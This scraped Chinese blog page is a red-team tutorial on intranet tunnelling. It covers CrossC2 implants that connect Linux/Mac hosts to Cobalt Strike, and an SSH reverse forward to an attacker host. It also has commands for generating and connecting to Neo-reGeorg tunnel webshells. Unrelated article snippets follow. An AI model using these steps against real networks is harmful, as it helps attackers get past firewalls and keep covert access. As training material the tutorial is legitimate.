当前位置：首页 > news >正文

内网对抗-隧道技术篇防火墙组策略HTTP反向SSH转发出网穿透CrossC2解决方案

news 2026/3/31 2:26:57

知识点：

1、C2/C2上线-CrossC2插件-多系统平台支持
2、隧道技术篇-应用层-SSH协议-判断&封装&建立&穿透
3、隧道技术篇-应用层-HTTP协议-判断&封装&建立&穿透

在这里插入图片描述
隧道技术主要解决网络通讯问题：遇到防火墙就用隧道技术，如果没有防火墙纯内网就用socks代理。

在这里插入图片描述

一、演示案例-C2上线-多平台系统-CrossC2项目&Linux&Mac&IOS&Android

该插件目前支持Linux&Mac上线（IOS&Android暂未支持，未来版本支持）
https://github.com/gloxec/CrossC2

使用参考：
https://gloxec.github.io/CrossC2/zh_cn/
目前版本只支持反向的https和正向的tcp

1、下载对应版本加载器和CNA插件

在这里插入图片描述

2、上传加载器文件和本地加载CNA插件

在这里插入图片描述

3、修改CNA插件配置路径

在这里插入图片描述

4、使用命令或插件绑定HTTPS监听器生成

一、插件绑定HTTPS监听器生成(修改cna配置文件的情况下)

在这里插入图片描述

二、命令(未修改cna配置文件的情况下)

插件绑定HTTPS监听器生成木马，就会有条命令，复制这个命令在攻击机终端生成即可
在这里插入图片描述

二、演示案例-隧道技术-SSH转发-出站限制&信息收集

在这里插入图片描述

SSH 隧道搭建内网穿透：（解决目标出站限制做信息收集）
注：windows也可以支持ssh，需要单独安装该服务罢了。
由于CS无SSH协议监听器配置，无法上线cs。

1、环境复现搭建

如：模拟Linux为被控机，配置防火墙策略
iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口，一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口，一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */如：模拟Windows为被控机，配置防火墙策略：SSH 22端口放行自己的服务器记得开启ssh协议登录：
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

2、适用场景

内网主机防火墙限制了出网协议，可以利用SSH转发流量实现内网穿透

3、需要条件：（解决目标出站限制）

被控主机需支持SSH协议（Windows需要安装支持软件）
将2.22上80端口流量转发到xx.xx上的1234端口(xx.xx就是攻击机)
ssh -CfNg -R 1234:192.168.2.22:80 root@xx.xx.xx.xx

在这里插入图片描述
攻击机上：

curL http://127.0.0.1:1234

在这里插入图片描述

三、演示案例-隧道技术-HTTP反向-出站限制&信息收集&上线

在这里插入图片描述

情况1-HTTP隧道搭建内网穿透：（解决目标出站限制做信息收集）

一、项目Neo-reGeorg(把数据封装成http/https隧道)

https://github.com/L-codes/Neo-reGeorg

1、设置密码生成(aspx|ashx|jsp|jspx|php)并上传

python neoreg.py generate -k password

在这里插入图片描述

2、使用 neoreg.py 连接 WEB 服务器，在本地建立 socks5 代理

python3 neoreg.py -k password -u http://xx/tunnel.php

在这里插入图片描述

3、Proxifier添加socks5服务器并配置连接规则测试

在这里插入图片描述

二、哥斯拉&冰蝎-内网穿透

哥斯拉：HttpProxy

在这里插入图片描述

冰蝎：内网穿透

在这里插入图片描述

情况2-HTTP隧道搭建上线C2：（解决目标出站限制上线C2）

太多时候遇到目标不出网了，TCP、ICMP、DNS协议均不通，
无法直接与公网的CS/MSF/Sliverd等其他C2服务端建立连接。
在这里插入图片描述

使用HTTP隧道上线c2没什么必要，直接用正反向上线就行(正反向能上线，那么http隧道也能上线，正反向不能上线，http隧道也不能上线)

内网对抗-隧道技术篇防火墙组策略HTTP反向SSH转发出网穿透CrossC2解决方案

知识点： 1、C2/C2上线-CrossC2插件-多系统平台支持 2、隧道技术篇-应用层-SSH协议-判断&封装&建立&穿透 3、隧道技术篇-应用层-HTTP协议-判断&封装&建立&穿透隧道技术主要解决网络通讯问题：遇到防火墙就用隧道技术，…...

编程日记 2024/7/27 3:51:55

实战案例：如何用ChatGPT生成适合不同领域的高质量文章

随着人工智能技术的快速进展，制作高质量文章已变得轻而易举。尤其是OpenAI推出的ChatGPT，极大地简化了写作任务。接下来，本文将通过具体案例，详解如何利用ChatGPT撰写不同领域的高品质文章。背景：光辉AI交流-免费问答…...

编程日记 2024/7/27 3:48:51

多线程案例-单例模式

单例模式是设计模式之一，能保证某个类在程序中只存在唯一一份实例，而不会创建出多个实例单例模式的具体实现方法有很多，最常见的是 “饿汉” 和 “懒汉” 两种。饿汉模式 class Singlenton{private static Singlenton instance new Sin…...

编程日记 2024/7/27 3:45:48

P6 优化篇 - 数据折线图可视化步骤

增加新页面, 则需要在 page.json里面增加页面信息 2.添加目录, 和路径同时也要添加目录了 , 新建目录LineChart , 添加文件LineChart.vue 4.LineChart.vue 直接复制黏贴 <template><view class"container"><view cla…...

编程日记 2024/7/27 3:44:46

优选算法之二分查找（上）

目录一、二分查找 1.题目链接：704. 二分查找 2.题目描述： 3.算法流程： 4.算法代码： 二、在排序数组中查找元素的第一个和最后一个位置 1.题目链接：34. 在排序数组中查找元素的第一个和最后一个位置 2.题目描述…...

编程日记 2024/7/27 3:42:45

JavaScript(16)——定时器-间歇函数

开启定时器 setInterval(函数,间隔时间) 作用：每隔一段时间调用这个函数，时间单位是毫秒例如：每一秒打印一个hello setInterval(function () { document.write(hello ) }, 1000) 注：如果是具名函数的话不能加小括号&#xf…...

编程日记 2024/7/27 3:40:42

VUE中的重点*

1.MVC 和 MVVM的区别？ MVC：M（model数据）、V（view视图），C（controlle控制器） 缺点是前后端无法独立开发，必须等后端接口做好了才可以往下走； 前端没…...

编程日记 2024/7/27 3:38:40

rabbitmq生产与消费

一、rabbitmq发送消息一、简单模式概述一个生产者一个消费者模型代码 //没有交换机，两个参数为routingKey和消息内容 rabbitTemplate.convertAndSend("test1_Queue","haha");二、工作队列模式概述一个生产者，多个消费者&a…...

编程日记 2024/7/27 3:32:34

spring-boot3.x整合Swagger 3 (OpenAPI 3) +knife4j

1.简介 OpenAPI阶段的Swagger也被称为Swagger 3.0。在Swagger 2.0后，Swagger规范正式更名为OpenAPI规范，并且根据OpenAPI规范的版本号进行了更新。因此，Swagger 3.0对应的就是OpenAPI 3.0版本，它是Swagger在OpenAPI阶段推出的一个…...

编程日记 2024/7/27 3:31:33

SM2隐式证书用户公私钥生成python代码实现

GMT0130-2023具体描述基于SM2算法的隐式证书公钥机制，这里尝试Python代码实现密钥生成部分功能，具体如下，椭圆曲线计算实现使用python第三方包gmssl。 #生成用户私钥Da和公钥Pa，其中Da（tAdA)mod N，Pa可以直…...

编程日记 2024/7/27 3:29:31

IEC104转MQTT网关快速实现了IEC104到MQTT的转换和数据交互

随着智能电网技术的不断进步，IEC 104（IEC 60870-5-104）协议作为电力系统中重要的远动通信标准，正逐步融入更广泛的物联网生态系统中。亚马逊AWS（Amazon Web Services），作为全球领先的云计算服务…...

编程日记 2024/7/27 3:23:24

【OpenCV C++20 学习笔记】调节图片对比度和亮度（像素变换）

调节图片对比度和亮度（像素变换） 原理像素变换亮度和对比度调整代码实现更简便的方法结果展示 γ \gamma γ校正及其实操案例线性变换的缺点 γ \gamma γ校正低曝光图片矫正案例代码实现原理关于OpenCV的配置和基础用法，请参阅本专栏的其…...

编程日记 2024/7/27 3:21:23

web UI自动化测试浏览器模式设置

自动化之浏览器模式设置做selenium UI自动化测试时，每次都需要启动浏览器、用例运行结束后再关闭浏览器，浏览器启动相当地耗费时间，在本机运行用例的话还得放开双手，可以使用chrome的headless模式，让浏览器在后台运行…...

编程日记 2024/7/27 3:20:22

OpenCV图像滤波（1）双边滤波函数bilateralFilter的使用

操作系统：ubuntu22.04 OpenCV版本：OpenCV4.9 IDE:Visual Studio Code 编程语言：C11 功能描述 bilateralFilter是图像处理和计算机视觉领域中的一种高级图像滤波技术，特别设计用于在去除噪声的同时保留图像的边缘和细节。相比于传…...

编程日记 2024/7/27 3:18:20

1、下载 npm install big.js 全局引入还是局部引入可根据项目框架及个人需求 2、静态引入 < script src https://unpkg.com/big.js6.0.0/big.mjs > </ script > 或者 import Big from https://raw.githubusercontent.com/mikemcl/big.js/v6.0.0/big.mjs; i…...

编程日记 2024/7/27 3:15:17

在 Ubuntu 22.04/20.04 安装 CVAT 和 SAM 指南

1. 安装 Docker 和 Docker Compose sudo apt-get update sudo apt-get --no-install-recommends install -y \apt-transport-https \ca-certificates \curl \gnupg-agent \software-properties-common curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-ke…...

编程日记 2024/7/27 3:14:14

一、演示案例-C2上线-多平台系统-CrossC2项目&Linux&Mac&IOS&Android

1、下载对应版本加载器和CNA插件

2、上传加载器文件和本地加载CNA插件

3、修改CNA插件配置路径

4、使用命令或插件绑定HTTPS监听器生成

一、插件绑定HTTPS监听器生成(修改cna配置文件的情况下)

二、命令(未修改cna配置文件的情况下)

二、演示案例-隧道技术-SSH转发-出站限制&信息收集

1、环境复现搭建

2、适用场景

3、需要条件：（解决目标出站限制）

三、演示案例-隧道技术-HTTP反向-出站限制&信息收集&上线

情况1-HTTP隧道搭建内网穿透：（解决目标出站限制做信息收集）

一、项目Neo-reGeorg(把数据封装成http/https隧道)

1、设置密码生成(aspx|ashx|jsp|jspx|php)并上传

2、使用 neoreg.py 连接 WEB 服务器，在本地建立 socks5 代理

3、Proxifier添加socks5服务器并配置连接规则测试

二、哥斯拉&冰蝎-内网穿透

哥斯拉：HttpProxy

冰蝎：内网穿透

情况2-HTTP隧道搭建上线C2：（解决目标出站限制上线C2）

相关文章：